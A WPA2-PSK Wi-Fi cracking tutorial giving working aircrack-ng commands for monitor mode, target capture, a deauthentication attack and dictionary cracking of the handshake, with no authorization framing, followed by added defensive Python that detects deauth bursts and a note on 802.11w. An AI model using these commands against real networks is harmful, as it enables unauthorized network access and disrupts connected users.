WPA2 PSK
Hacking process
Place wireless card into monitor mode
Discover information about network (Channel & BSSID)
Select network and capture data
Perform deauth attack
Capture WPA handshake
Attempt to crack the handshake
Exploit walkthrough
Monitor mode
iwconfig
airmon-ng check kill
airmon-ng start wlan0 #start monitor mode
iwconfig #verify
Discover information
airodump-ng wlan0mon
#BSSID is the mac address
#PWR is the signal level, which reflects distance from the device (a value closer to 0 means we are nearer)
#CH is the channel
#ENC is the type (here WPA2)
#ESSID is the name of the SSID; if it is hidden, only its length is shown
Select network and capture data
airodump-ng -c 6 --bssid <BSSID> -w capture wlan0mon
# -c for channel
# --bssid target router
# -w filename capture
After that we will see the devices attached to the network.
Then, to capture the handshake, we can either wait for a client to connect or, to speed up the process, kick a connected client off the network so it reconnects.
Perform deauth attack
# Open a new tab
aireplay-ng -0 1 -a <BSSID> -c <client_mac_address> wlan0mon
# -0 means deauth and 1 = run one time
Capture WPA handshake
Once the deauth frames are sent, the WPA handshake should pop up in the other tab. Look at capture.cap.
Attempt to crack the handshake
aircrack-ng -w <wordlist.txt> -b <BSSID> capture.cap
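A defender-side check for the deauth step above, as an added example that is not part of the original page: it decodes raw 802.11 management frames (assumes the radiotap header has already been stripped), counts deauthentication frames per BSSID/client pair, and flags bursts, which is what a wireless IDS alerts on. The MAC addresses and the frames themselves are constructed samples.

```python
import struct
from collections import Counter

MGMT_TYPE = 0          # 802.11 frame type 0 = management
DEAUTH_SUBTYPE = 12    # management subtype 0xC = Deauthentication
BROADCAST = bytes.fromhex("ffffffffffff")


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_frame(frame: bytes) -> dict:
    """Decode the fixed 24-byte 802.11 MAC header (radiotap header assumed already stripped)."""
    fc = frame[0]
    info = {
        "type": (fc >> 2) & 0x3,
        "subtype": (fc >> 4) & 0xF,
        "dst": mac_str(frame[4:10]),     # Address 1
        "src": mac_str(frame[10:16]),    # Address 2
        "bssid": mac_str(frame[16:22]),  # Address 3
    }
    if info["type"] == MGMT_TYPE and info["subtype"] == DEAUTH_SUBTYPE:
        # Deauth body is a 2-byte little-endian reason code right after the header
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def detect_deauth_bursts(frames, threshold: int = 5) -> dict:
    """Count deauth frames per (bssid, victim) pair; return pairs at or above threshold."""
    counts = Counter()
    for f in frames:
        p = parse_frame(f)
        if p["type"] == MGMT_TYPE and p["subtype"] == DEAUTH_SUBTYPE:
            counts[(p["bssid"], p["dst"])] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


def _frame(ftype, subtype, dst, src, bssid, body=b""):
    # Builds an in-memory frame for the constructed sample: FC, duration, 3 addresses, seq ctrl
    fc = bytes([(subtype << 4) | (ftype << 2), 0x00])
    return fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body


def sample_capture():
    """Constructed sample: one beacon, one data frame, then 8 deauths aimed at one client."""
    ap = bytes.fromhex("001122334455")      # constructed AP BSSID
    client = bytes.fromhex("aabbccddee01")  # constructed client MAC
    frames = [_frame(0, 8, BROADCAST, ap, ap), _frame(2, 0, ap, client, ap)]
    frames += [_frame(0, 12, client, ap, ap, struct.pack("<H", 7)) for _ in range(8)]
    return frames
```

Enabling Protected Management Frames (802.11w) on the access point is the corresponding mitigation, since clients then discard unauthenticated deauthentication frames.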